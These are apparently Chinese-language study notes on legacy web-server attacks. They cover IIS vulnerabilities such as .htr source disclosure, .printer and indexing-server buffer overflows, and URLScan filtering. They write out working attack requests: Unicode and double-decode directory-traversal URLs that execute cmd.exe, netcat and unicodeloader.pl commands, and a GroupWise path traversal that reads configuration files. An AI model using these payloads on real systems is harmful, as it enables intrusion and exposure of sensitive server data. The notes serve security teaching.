通過netcat進行管道傳輸,連接到一個脆弱的服務器上
Netcat –vv 網站< htr.txt
URLSCan 一個模板驅動的過濾器,向IIS解析請求
分爲兩種文件
分別是UrlScan.dll和UrlScan.iniUrlScan.ini爲配置文件,
向被拒絕的請求發送http404,目標未發現
阻止***者獲取任何一點有關目標服務器的信息
+.htr源代碼泄露,MS01—004/default.asp+.htr
Web目錄路徑泄露 /null.idc
服務器端包含緩衝區溢出/file.stm,.shtm,shtml
.printer緩衝區溢出MS01—023/null.printer
索引服務器緩衝區溢出/null.ida,idq
Webhits源泄露MS00—006 /null.htw
Frontpage服務器擴展緩衝區溢出 MS01—035/_vti_bin/_vti_aut/fp3Oreg.dll
IIS目錄遍歷的脆弱點分別是Unicode和double decode***
討論一些達到初始訪問目的的機制,他們可以征服整個系統
GET/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+’c:\’http/1.0
http://網站/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
使用軟件unicodeloader.pl
unicodeloader.pl 網站:80 C:\inetpub\scripts
Novell GroupWise任意文件的訪問
http://網站/servlet/webacc?User.html=../../../../novell/WebAcess/webacc.cfg%00
這種***的另一個後果是:即使運行了生產商的補丁,novell安裝的路徑也會被暴露,同時會***者可能會窺視WEBacess目錄中的commgr。Cfg和ldap.cfg文件中的敏感信息